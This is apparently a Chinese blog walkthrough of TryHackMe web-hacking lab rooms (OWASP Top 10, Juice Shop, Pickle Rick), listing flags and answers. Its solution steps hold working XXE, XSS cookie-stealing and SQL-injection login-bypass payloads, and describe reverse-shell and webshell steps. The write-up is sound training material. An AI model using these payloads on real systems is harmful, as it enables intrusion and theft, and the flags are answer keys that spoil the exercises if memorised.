Web Hacking Fundamentals

Web Fundamentals

task1 Introduction and objectives

1.Read and understand the information

task2 How do we load websites?

1.What request verb is used to retrieve page content?

get

2.What port do web servers normally listen on?

80

3.What’s responsible for making websites look fancy?

CSS

网页的实际内容通常是HTML、CSS和JavaScript的组合。 HTML 定义页面结构和内容。CSS 允许您更改页面的外观，使其看起来花哨。JavaScript 是一种在浏览器中运行的编程语言，允许您使页面交互或加载额外的内容。

task3 More HTTP - Verbs and request formats

1.What verb would be used for a login?

post

2.What verb would be used to see your bank balance once you’re logged in?

get

3.Does the body of a GET request matter? Yea/Nay

Nay

4.What’s the status code for “I’m a teapot”?

418

IETF在1998年愚人节时发布的一个笑话RFC，具体可以参考RFC 2324 - Hyper Text Coffee Pot Control Protocol (HTCPCP/1.0)超文本咖啡壶控制协议。
htcpcp1.0协议中的418的意义是：当客户端给一个茶壶发送泡咖啡的请求时，茶壶就返回一个418错误状态码，表示“我是一个茶壶“

5.What status code will you get if you need to authenticate to access some content, and you’re unauthenticated?

401

task4 Cookies, tasty!

1.Read and try and understand this information. Check out the link for extra information

task5 Mini CTF

1.What’s the GET flag?

thm{162520bec925bd7979e9ae65a725f99f}

curl http://10.10.103.59:8081/ctf/get

2.What’s the POST flag?

thm{3517c902e22def9c6e09b99a9040ba09}

curl -d flag_please http://10.10.103.59:8081/ctf/post

3.What’s the “Get a cookie” flag?

thm{91b1ac2606f36b935f465558213d7ebd}

火狐浏览器访问http://10.10.103.59:8081/ctf/getcookie,查看浏览器cookie

4.What’s the “Set a cookie” flag?

thm{c10b5cb7546f359d19c747db2d0f47b3}

修改domain为10.10.103.59的cookie名/值都为flagpls,访问http://10.10.103.59:8081/ctf/sendcookie;

或者在上一问使用curl -c cookie.txt http://10.10.103.59:8081/ctf/getcookie 获取cookie,修改cookie名/值为flagpls，再使用curl -b cookie.txt http://10.10.103.59:8081/ctf/sendcookie 得到flag

OWASP Top 10

task1 Introduction

• Injection
• Broken Authentication
• Sensitive Data Exposure
• XML External Entity
• Broken Access Control
• Security Misconfiguration
• Cross-site Scripting
• Insecure Deserialization
• Components with Known Vulnerabilities
• Insufficent Logging & Monitoring

task2 Accessing machines

Connect to our network or deploy the AttackBox.

task3 [Severity 1] Injection

I’ve understood Injection attacks.

task4 [Severity 1] OS Command Injection

I’ve understood command injection.

task5 [Severity 1] Command Injection Practical

1.What strange text file is in the website root directory?

drpepper.txt

2.How many non-root/non-service/non-daemon users are there?

0

3.What user is this app running as?

www-data

4.What is the user’s shell set as?

usr/sbin/nologin

5.What version of Ubuntu is running?

18.04.4

6.Print out the MOTD. What favorite beverage is shown?

DR PEPPER

00-header – /etc/update-motd.d/00-header 修改Ubuntu下ssh登录欢迎信息

task6 [Severity 2] Broken Authentication

1.I’ve understood broken authentication mechanisms.

task7 [Severity 2] Broken Authentication Practical

1.What is the flag that you found in darren’s account?

fe86079416a21a3c99937fea8874b667

注册用户时将darren和 darren认定为不同账户，登陆时认定为同一账户造成逻辑漏洞

2.Now try to do the same trick and see if you can login as arthur.

3.What is the flag that you found in arthur’s account?

d9acof7db4fda460ac3edeb75d75e16e

task8 [Severity 3] Sensitive Data Exposure (Introduction)

Read the introduction to Sensitive Data Exposure and deploy the machine.

task9 [Severity 3] Sensitive Data Exposure (Supporting Material 1)

Read and understand the supporting material on SQLite Databases.

task10 [Severity 3] Sensitive Data Exposure (Supporting Material 2)

Read the supporting material about cracking hashes.

task11 [Severity 3] Sensitive Data Exposure (Challenge)

1.What is the name of the mentioned directory?

/assets

2.Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data?

webapp.db

3.Use the supporting material to access the sensitive data. What is the password hash of the admin user?

6eea9b7ef19179a06954edd0f6c05ceb

4.What is the admin’s plaintext password?

qwertyuiop

md5在线解密破解,md5解密加密

5.Login as the admin. What is the flag?

THM{Yzc2YjdkMjE5N2VjMzNhOTE3NjdiMjdl}

task12 [Severity 4] XML External Entity

Deploy the machine attached to the task.

task13 [Severity 4 XML External Entity - eXtensible Markup Language

1.Full form of XML

eXtensible Markup Language

xml(eXtensible Markup Language)可扩展标记语言

2.Is it compulsory to have XML prolog in XML documents?

no

3.Can we validate XML documents against a schema?

yes

4.How can we specify XML version and encoding in XML document?

XML Prolog

task14 [Severity 4] XML External Entity - DTD

1.How do you define a new ELEMENT?

!ELEMENT

2.How do you define a ROOT element?

!DOCTYPE

3.How do you define a new ENTITY?

!ENTITY

!ELEMENT定义新的元素；!DOCTYPE定义根元素；!ENTITY定义新的实体

task15 [Severity 4] XML External Entity - XXE Payload

1.Try the payload mentioned in description on the website.

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>

task16[Severity 4] XML External Entity - Exploiting

1.Try to display your own name using any payload.

2.See if you can read the /etc/passwd

3.What is the name of the user in /etc/passwd

falcon

4.Where is falcon’s SSH key located?

/home/falcon/.ssh/id_rsa

5.What are the first 18 characters for falcon’s private key

MIIEogIBAAKCAQEA7b

task17 [Severity 5] Broken Access Control

Read and understand how broken access control works.

task18[Severity 5] Broken Access Control (IDOR Challenge)

1.Read and understand how IDOR works.

2.Deploy the machine and go to http://MACHINE_IP - Login with the username being noot and the password test1234.

3.Look at other users notes. What is the flag?

flag{fivefourthree}

task19 [Severity 6] Security Misconfiguration

1.Deploy the VM

2.Hack into the webapp, and find the flag!

thm{4b9513968fd564a87b28aa1f9d672e17}

(https://github.com/NinjaJc01/PensiveNotes)

task20 [Severity 7] Cross-site Scripting

1.Deploy the VM

2.Navigate to http://10.10.131.49/ in your browser and click on the “Reflected XSS” tab on the navbar; craft a reflected XSS payload that will cause a popup saying “Hello”.

ThereIsMoreToXSSThanYouThink

3.On the same reflective page, craft a reflected XSS payload that will cause a popup with your machines IP address.

ReflectiveXss4TheWin

<script>alert(window.location.hostname)</script>

4.Now navigate to http://10.10.131.49/ in your browser and click on the “Stored XSS” tab on the navbar; make an account.

Then add a comment and see if you can insert some of your own HTML.

HTML_T4gs

5.On the same page, create an alert popup box appear on the page with your document cookies.

W3LL_D0N3_LVL2

<script>alert(document.cookie)</script>

6.Change “XSS Playground” to “I am a hacker” by adding a comment and using Javascript.

websites_can_be_easily_defaced_with_xss

<script>document.querySelector('#thm-title').textContent = 'I am a hacker'</script>

task21 [Severity 8] Insecure Deserialization

1.Who developed the Tomcat application?

Apache Software Foundation

2.What type of attack that crashes services can be performed with insecure deserialization?

Denial of Service

反序列化漏洞会造成Dos（Denial of Service）和远程代码执行RCE (Remote Code Execution)

task22 [Severity 8] Insecure Deserialization - Objects

if a dog was sleeping, would this be:

A) A State
B) A Behaviour

A Behaviour

task23 [Severity 8] Insecure Deserialization - Deserialization

What is the name of the base-2 formatting that data is sent across a network as?

binary

task24 [Severity 8] Insecure Deserialization - Cookies

1.If a cookie had the path of webapp.com/login , what would the URL that the user has to visit be?

webapp.com/login

2.What is the acronym for the web technology that Secure cookies work over?

https

secure属性只在https连接发送；http only 不允许js脚本读取cookie

task25 [Severity 8] Insecure Deserialization - Cookies Practical

1.1st flag (cookie value)

THM{good_old_base64_huh}

2.2nd flag (admin dashboard)

THM{heres_the_admin_flag}

task26 [Severity 8] Insecure Deserialization - Code Execution

flag.txt

执行修改后在Github上得到的python脚本，得到base64编码后的反弹shell脚本，写入cookie的encodepayload中发送请求

4a69a7ff9fd68

task27 [Severity 9] Components With Known Vulnerabilities - Intro

Read above.

task28 [Severity 9] Components With Known Vulnerabilities - Exploit

Read the above!

task29 [Severity 9] Components With Known Vulnerabilities - Lab

How many characters are in /etc/passwd (use wc -c /etc/passwd to get the answer)

主页右下方点击Admin Login进入登录界面，万能密码 %’ or ‘1’='1进入后台页面，后台添加书籍信息存在任意文件上传漏洞，上传小马。返回页面，找到新增书籍，反弹shell成功

1611

task30 [Severity 10] Insufficient Logging and Monitoring

1.What IP address is the attacker using?

49.99.13.16

2.What kind of attack is being carried out?

暴力破解Brute Force

task31 What Next?

Read the above!

OWASP Juice Shop

task1 Open for business!

1.Deploy the VM attached to this task to get started! You can access this machine by using your browser-based machine, or if you’re connected through OpenVPN.

2.Once the machine has loaded, access it by copying and pasting its IP into your browser; if you’re using the browser-based machine, paste the machines IP into a browser on that machine.

task2 Let’s go on an adventure!

1.Question #1: What’s the Administrator’s email address?

The reviews show each user’s email address. Which, by clicking on the Apple Juice product, shows us the Admin email!

admin@juice-sh.op

2.We can now see the search parameter after the /#/search? the letter q

q

3.If we google “replicator” we will get the results indicating that it is from a TV show called Star Trek

Star Trek

tsak 3 Inject the juice

1.Question #1: Log into the administrator account!

32a5e0f21372bcc1000a6088b93b458e41f0e02a

使用万能密码登录，payload 1’ or ‘1’=‘1’–

2.Question #2: Log into the Bender account!

fb364762a3c102b2db932069c0e6b78e738d4066

同样使用万能密码，payload bender@juice-sh.op’–

task 4 Who broke my lock?!

1.Question #1: Bruteforce the Administrator account’s password!

c2110d06dc6f81c67cd8099ff0ba601241f1ac0e

暴力破解出admin@juice-sh.op账户的密码为admin123

2.Question #2: Reset Jim’s password!

094fbc9b48e525150ba97d05b942bbf114987257

安全问题为兄弟的中间名，上一问jim 与 Star Trek（星际迷航）有关，他的兄弟叫George Samuel Kirk

task 5 AH! Don’t look!

1.Question #1: Access the Confidential Document!

edf9281222395a1c5fee9b89e32175f1ccf50c5b

点击关于我们链接 http://10.10.164.205/ftp/legal.md ，进入ftp目录可以看到很多文件

2.Question #2: Log into MC SafeSearch’s account!

搜索MC SafeSearch，油管上有相关视频可得知他的密码为 "Mr. Noodles"但 "vowels into zeros"将元音字母变成0，密码为 Mr.N00dles

3.Question #3: Download the Backup file!

在ftp目录下载pack只允许age.json.bak文件报错只允许下载md和pdf文件，使用%00截断下载文件

task6 Who’s flying this thing?

1.Question #1: Access the administration page!

946a799363226a24822008503f5d1324536629a0

直接访问管理后台报错403，需要登录管理员账号才能访问

2.Question #2: View another user’s shopping basket!

41b997a36cc33fbe4f0ba018474e19ae5ce52121

burp截取访问购物车URLhttp://10.10.164.205/rest/basket/1，1代表用户ID，修改为其他用户ID即可平行越权访问

3.Question #3: Remove all 5-star reviews!

50c97bcce0b895e446d61c83a21df371ac2266ef

登录后台页面，删除右侧5星评论即可

task 7 Where did that come from?

1.Question #1: Perform a DOM XSS!

9aaf4bbea5c30d00a1f5bbcfce4db6d4b0efe0bf

<iframe src="javascript:alert(xss)">搜索框输入payload即可

2.Question #2: Perform a persistent XSS!

149aa8ce13d7a4a8a931472308e269c94dc5f156

对URL True-Client-IP没有做过滤

3.Question #3: Perform a reflected XSS!

23cefee1527bde039295b2616eeb29e1edc660a0

URLhttp://10.10.164.205/#/track-result?id=5267-d156f507ae884e75的参数id没有做过滤直接显示在页面上，id参数换成payload请求弹窗(建议使用firefox)

task 8 Exploration!

Access the /#/score-board/ page

7efd3174f9dd5baa03a7882027f2824d2f72d86e

/score-board 计分板页面

参考：靶场Juice-Shop学习

Rickle Rick

Task1 Pickle Rick

1.What is the first ingredient Rick needs?

查看源代码，源代码注释中发现 用户名R1ckRul3s

对网站进行目录遍历发现login.php与robots.txt,查看robots.txt内容得到Wubbalubbadubdub，猜测为密码

登录发现命令执行页面，whoami查看账户为www-data，la -a查看目录下文件，在Sup3rS3cretPickl3Ingred.txt中得到第一种原料为 mr. meeseek hair

2.Whats the second ingredient Rick needs?

使用；符号在Commands页面同时执行多个命令，因为不能使用cat命令查看使用less命令代替，在/home/rick文件夹下发现second ingredients文件

jerry tear

3.Whats the final ingredient Rick needs?

运行sudo -l命令发现命令框可以无需密码执行sudo，sudo ls /root查看root目录下文件发现3rd.txt，读取文件发现第三种成分

fleeb juice

Tryhackme-Web Hacking Fundamentals相关推荐

1. 《Web Hacking 101》中的链接整理

   <Web Hacking 101>中的链接整理 原书:Web Hacking 101 HTML 注入 Coinbase Comments HackerOne Unintended HTML ...

2. 2021年十大 web hacking 技术汇总

    聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 PortSwigger 发布2021年的前十大 Web Hacking 技术.该媒体自2015年开始向信息安全社区征求候选名单,本次共收到40份 ...

3. Tryhackme-Introduction to Web Hacking

   Introduction to Web Hacking 文章目录 Introduction to Web Hacking Walking An Application Task1 Walking An ...

4. Web Hacking 101 中文版 十三、子域劫持

   十三.子域劫持 作者:Peter Yaworski 译者:飞龙 协议:CC BY-NC-SA 4.0 描述 子域控制就真的是听上去那样,它是一种场景,恶意用户能够代表合法站点来申请一个子域.总之,这一 ...

5. Web Hacking 101 中文版 十七、服务端请求伪造

   十七.服务端请求伪造 作者:Peter Yaworski 译者:飞龙 协议:CC BY-NC-SA 4.0 描述 服务端请求伪造,或者 SSRF,是一种类型,它允许攻击者使用目标服务器来代表攻击者自己 ...

6. Web Hacking 101 中文版 二十、漏洞报告

   二十.漏洞报告 作者:Peter Yaworski 译者:飞龙 协议:CC BY-NC-SA 4.0 所以这一天终于来了,你发现了你的第一个漏洞. 首先,恭喜你! 认真来讲,发现漏洞并不容易,但是有一 ...

7. Web Hacking 101 中文版 十八、内存（一）

   十八.内存 作者:Peter Yaworski 译者:飞龙 协议:CC BY-NC-SA 4.0 描述 缓冲区溢出是一个场景,其中程序向缓冲区或内容区域写入数据,写入的数据比实际分配的区域要多.使用冰 ...

8. Web Hacking 101 中文版 十八、内存（二）

   2. Python Hotshot 模块 难度:高 URL:无 报告链接:http://bugs.python.org/issue24481 报告日期:2015.7.20 奖金:$500 描述: 像 ...

9. Web Hacking 101 中文版 九、应用逻辑漏洞（三）

   7. 绕过 Gitlab 的双因素认证 难度:中 URL:无 报告链接:https://hackerone.com/reports/128085 报告日期:2016.4.3 奖金:无 描述: 4 月 ...

10. Web Hacking 101 中文版 九、应用逻辑漏洞（一）

    九.应用逻辑漏洞 作者:Peter Yaworski 译者:飞龙 协议:CC BY-NC-SA 4.0 应用逻辑漏洞不同于其他我们讨论过的类型.虽然 HTML 注入.HTML 参数污染和 XSS 都涉 ...

最新文章

1. 【UVA】10012 - How Big Is It?（暴力）
2. 这三个NLP项目写进简历，网申通过率提高50%
3. 大批量文件处理的7条建议
4. 使用ADF BC管理保存点
5. Hawtio和Apache JClouds
6. boot整合redis
7. java实体类属性非空判断工具类
8. [Data Structure Algorithm] 哈希表
9. Mybatis和Hibernate区别
10. android 两个视频合并,手机如何合并视频片段 安卓手机多个视频合并成一个的方法...
11. Java核心技术卷一基础知识-第3章-Java的基本程序设计结构-读书笔记
12. 商务英语还是计算机专业好,是读广东外语外贸大学计算机专业好还是广东工业大学计算机专业好...
13. mysql 2182_MySql常用命令总结
14. MIKE21学习总结（一）
15. 运动数据采集，医疗数据采集
16. Chromium for mac(谷歌浏览器)V89.0.4336.0官方最新版
17. 西安研究所 计算机专业,智能计算研究所
18. buuctf-misc-[SWPU2019]Network1
19. 中英互译软件测试计划
20. 面对互联网风口下的人口老龄化，AI智能如何做好医疗健康管理？

热门文章

1. optuna自动调参框架对lgb的超参进行优化
2. echarts 柱状图圆柱_使用echarts画柱状图
3. Microsoft Excel 教程：如何在 Excel 中筛选唯一值或删除重复值？
4. ajax 皇马,历史上最伟大11支球队 西班牙国家队在列 皇马两次入选
5. 跟铁拐李李老师学习工作流的第二天
6. Java8新特性 方法引用(四)
7. 豫科技版计算机七年级上册,七年级下册信息技术教案第一单元第一课《制作新春灯笼》豫科技版.doc...
8. 仰望星空不如脚踏实地
9. 【Burp Suite实战指南】【定期更新】
10. android 适配俄语添加,【技术贴】怎么在手机上添加俄语输入法？，怎样在电脑上打俄语重音？...